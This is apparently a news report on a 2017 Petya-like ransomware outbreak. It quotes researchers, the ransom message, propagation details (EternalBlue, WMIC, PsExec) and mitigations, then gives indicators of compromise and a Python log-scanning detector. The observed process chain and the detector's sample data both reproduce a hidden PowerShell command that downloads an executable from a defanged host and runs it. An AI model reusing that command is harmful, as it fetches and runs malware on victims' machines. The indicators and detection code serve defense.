Companies in the UK, USA, India and across Europe are reported to have been infected with the widely reported ransomware.
While security companies that researched the malware claim it is not the Petya variant reported earlier but a brand new variant, companies including US pharmaceutical Merck, law firm DLA Piper, a hospital in Pittsburgh and UK digital advertising firm WPP are among those affected.
Becky Pinkard, vice president of service delivery and intelligence at Digital Shadows, said: “There is some confusion over the origins and nature of Petya, with some reports suggesting there are similarities to WannaCry and that it utilizes the EternalBlue SMBv1 worm functionality. More work is needed to investigate the way the virus propagates; in the meantime businesses are urged to ensure their software is up-to-date and all files backed up.”
Affected systems are displaying this message:
“Ooops, your important files are encrypted.
“If you see this text, then your files are no longer accessible, because they have been encrypted. Perhaps you are busy looking for a way to recover your files, but don’t waste your time. Nobody can recover your files without our decryption service.
“We guarantee that you can recover all your files safely and easily. All you need to do is submit the payment and purchase the decryption key.”
At the time of writing, the Bitcoin wallet associated with this attack showed 42 payments, all of them made from 27 June onwards.
Brian Hussey, VP of cyber threat detection and response at Trustwave, said: “This version is a much more advanced approach that requires a sophisticated skillset in programming and truly renders everything on the victim’s computer fully inaccessible. It does not just encrypt user files on the existing Operating System, rather it launches a custom bootloader that encrypts the Master File Table and the Master Boot Record, as well as system files. It restarts the computer and launches directly into the Petya bootloader, thereby cutting any access to the Operating System (or any files) at all, until the ransom is paid and the computer can go back to booting normally.
“Original versions of Petya released in 2016 showed programming errors that allowed a security analyst to decode the ransomed files. This issue was fixed in recent versions of the malware and we wouldn’t expect this to be present in current versions.”
However, other researchers said their preliminary findings suggested that it is not Petya. They said: “This appears to be a complex attack which involves several attack vectors. We can confirm that a modified EternalBlue exploit is used for propagation at least within the corporate network.”
In terms of how it infected businesses, early analysis suggested that it uses a combination of the EternalBlue vulnerability that was used for the WannaCry ransomware in May, as well as Windows Management Instrumentation Command-line (WMIC) and the PsExec tool.
Also, it was reported that Posteo administrators have disconnected the email address associated with paying the ransomware. Pinkard said: “This means that if anyone paying the ransom to unencrypt their files tries to do so, the criminals who distributed the attack are unable to access the bitcoin account the ransom goes to; so they will not be able to release the keys for the encrypted files – even if they ever intended to do so.”
Please be careful, and watch your email and attachments. Keep your defense tools updated.
1. Block the SMB and WMI ports: 135, 445 and 1024-1035 TCP.
2. Avoid rebooting! Cancel a pending shutdown with shutdown -a.
Mechanism: like WannaCry, it uses MS17-010. Encryption logic: once activated it schedules a delayed reboot, then runs a fake chkdsk, after which the victim sees the ransom demand and the system no longer boots. It encrypts the MBR, as earlier Petya ransomware did.
– – – – – – – – – – – – – – – – – – – – – – – –
File Name: Order-20062017.doc (actually an RTF exploiting CVE-2017-0199)
MD5: 415FE69BF32634CA98FA07633F4118E1
SHA-1: 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256: FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Size: 6215 bytes
File Type: Rich Text Format data

Downloaded from: h11p://220.127.116.11/myguy.xls (actually an HTA)
File Name: myguy.xls
MD5: 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1: 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256: EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
File Size: 13893 bytes
File Type: Zip archive data

Process chain observed:
mshta.exe "%WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" (PID: 2324)
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe') (PID: 2588)
10807.exe "%APPDATA%\10807.exe" (PID: 3096)

File Name: BCA9D6.exe
MD5: A1D5895F85751DFE67D19CCCB51B051A
SHA-1: 9288FB8E96D419586FC8C595DD95353D48E8A060
SHA-256: 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD
File Size: 275968 bytes
1) Check logs for the IOCs above.
2) Use GPO to block TCP ports 135, 445 and 1024-1035.
3) Avoid rebooting the system (cmd /k shutdown -a).
4) Do not format encrypted systems; take a disk image of them instead.
5) Block execution of .exe files from %AppData% and %Temp%.
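As an added example, not code from the article or from any vendor it quotes, the following Python applies steps 1 and 5 to data: it checks process-creation events for the mshta, hidden PowerShell and %APPDATA% executable chain recorded above, and looks file digests up against the SHA-256 values listed. The "PID=... IMAGE=... CMD=..." event format and the sample events are assumptions constructed here.

```python
import hashlib
import re
# SHA-256 values of the three files in the IOC list above, copied from the page.
IOC_SHA256 = {
    "FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206": "Order-20062017.doc",
    "EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6": "myguy.xls",
    "17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD": "BCA9D6.exe",
}

# Assumed event format (no real product's schema): "PID=<n> IMAGE=<path> CMD=<command line>".
EVENT_RE = re.compile(r"^PID=(?P<pid>\d+) IMAGE=(?P<image>\S+) CMD=(?P<cmd>.*)$")

# Behavioural rules mirroring the mshta -> hidden PowerShell -> %APPDATA%\<n>.exe chain above.
RULES = [
    ("mshta executing an .hta", "cmd", re.compile(r"mshta\.exe.*\.hta", re.I)),
    ("hidden PowerShell download into %APPDATA%", "cmd",
     re.compile(r"powershell\.exe.*-WindowStyle\s+Hidden.*DownloadFile.*APPDATA", re.I)),
    ("executable launched from %AppData% or %Temp%", "image",
     re.compile(r"(?:AppData%?|Temp%?)\\.*\.exe$", re.I)),
]

def scan_process_log(lines):
    """Return (pid, rule name) for every event that matches one of RULES."""
    hits = []
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue  # not an event in the assumed format
        for name, field, pattern in RULES:
            if pattern.search(m.group(field)):
                hits.append((int(m.group("pid")), name))
    return hits

def lookup_sha256(hexdigest):
    """Return the IOC file name for a SHA-256 hex digest (any case), or None."""
    return IOC_SHA256.get(hexdigest.upper())

def file_ioc_name(data):
    # Hash raw file contents and look the digest up on the IOC list.
    return lookup_sha256(hashlib.sha256(data).hexdigest())

# Constructed sample events modelled on the process chain above; not real telemetry.
SAMPLE_LOG = [
    r"PID=1001 IMAGE=C:\Windows\explorer.exe CMD=explorer.exe",
    r'PID=2324 IMAGE=C:\Windows\System32\mshta.exe CMD="C:\Windows\System32\mshta.exe" "C:\myguy.xls.hta"',
    r"PID=2588 IMAGE=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"CMD=powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient)"
    r".DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe')",
    r"PID=3096 IMAGE=C:\Users\victim\AppData\Roaming\10807.exe CMD=%APPDATA%\10807.exe",
]
```

Feed real process-creation events rewritten into the assumed format to scan_process_log, and file contents to file_ioc_name; the rules are deliberately narrow to the chain shown and will not catch other loaders.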